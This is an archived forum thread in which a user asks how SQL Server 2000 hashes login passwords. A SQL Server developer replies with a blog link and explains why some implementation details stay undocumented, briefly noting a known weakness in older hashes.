Hi,
Does anyone know which algorithm is being used to encrypt the passwords in the sysxlogins for SQL Server 2000? I've been googling for some time..but I can't seem to find this information. Please help.
Many thanks,
Leona
Laurentiu wrote a really good article on this topic, I hope you will find it useful:
http://blogs.msdn.com/lcris/archive/2007/04/30/sql-server-2005-about-login-password-hashes.aspx
-Raul Garcia
SDE/T
SQL Server Engine
|||Hi Raul,
Thanks for the link provision. Yeah, I saw this information too after so much googling yesterday and I agree it's good. However, it's a pity it ain't official. I was hoping to find the information from an official source, like the MSDN online docs, knowledge base etc. I'm surprised that I can't seem to locate this information...
Cheers,
Leona
|||Sometimes we don’t have “officially” documentation because of honest mistakes in the process and the intended documentation doesn’t exist at all, in such cases I encourage everyone to give us the proper feedback and we will open bugs for our BOL and try to get them fixed (not always possible due to resource limitations, and I apologize for that); but in other occasions some parts of a feature are not documented on purpose for good reason: if necessary, we reserve the rights to change the implementation.
As Laurentiu mentioned in his article, previous versions of the algorithm were different, and even opened the possibility for attempting to break the passwords via the case-insensitive hashes (as documented by David Litchfield). If the password algorithm would have been fully documented and supported, we may be still in the need to face the same documented weakness in favor of backwards compatibility (probably with some obscure knob to disable), as some applications may still be using it and we would need to go through the (painful) deprecation process.
On the other hand, we don’t believe in security by obscurity, and whenever we have the opportunity some members of the SQL Server team (and sometimes even former members of the team, kudos to Laurentiu for all his help) like to “unofficially” document some features according to our customers feedback or questions in the forums and/or our msdn blogs or when we believe it is useful information that should be documented, but for some reason is not officially documented.
While information on our blogs is not considered “official”, at least I know Laurentiu and I try to validate it and make sure the information and samples we provide are valid (and hopefully useful) because we are trying to help the SQL Server community.
We really appreciate all your feedback as it helps us to improve.
Thanks a lot,
-Raul Garcia
SDE/T
SQL Server Engine
No comments:
Post a Comment